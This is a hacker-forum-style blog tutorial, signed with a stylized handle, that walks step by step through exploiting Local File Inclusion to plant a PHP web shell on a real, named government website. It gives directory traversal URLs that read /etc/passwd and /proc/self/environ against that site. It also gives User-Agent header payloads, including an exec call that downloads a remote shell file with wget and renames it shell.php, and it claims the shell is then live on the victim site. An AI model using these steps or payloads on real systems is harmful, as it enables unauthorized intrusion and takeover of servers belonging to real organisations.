Local File Inclusion to shell upload
Tutorial provided by
| ๖ۣۜΗ α x O r ♥ |
Things you will need:
1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.sh3ll.org/egy.txt )
3) User-Agent switcher (
https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ )
4) Mozilla Firefox
First of all see if your site is vulnerable to LFI (I'm not
going to explain how to find it or exploit it)
Try to open etc/passwd
Example:
Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ
Example:
Code:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ
Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.
Now make new user-agent
Go to New > New User-Agent
Now leave everything as it is exept description and
user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Code:
<?php phpinfo();?>
Select your User-Agent in Tools > Default User Agent >
PHP Info (Or whatever you User Agent is called)
Go to your site and refresh it.
Now search for "disable_functions" (Ctrl+F Search
function)
Mine is
Code:
disable_functions | no value | no value
That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
Code:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>
(What this function do?. It downloads shell in .txt format
and renames it as shell.php)
Save it and refresh your site.
Go to http://www.yourLFIsite.com/shell.php (Mine is
http://www.bislig.gov.ph/shell.php )
Voila,we have our shell up.
Enjoy.
0 comments:
Post a Comment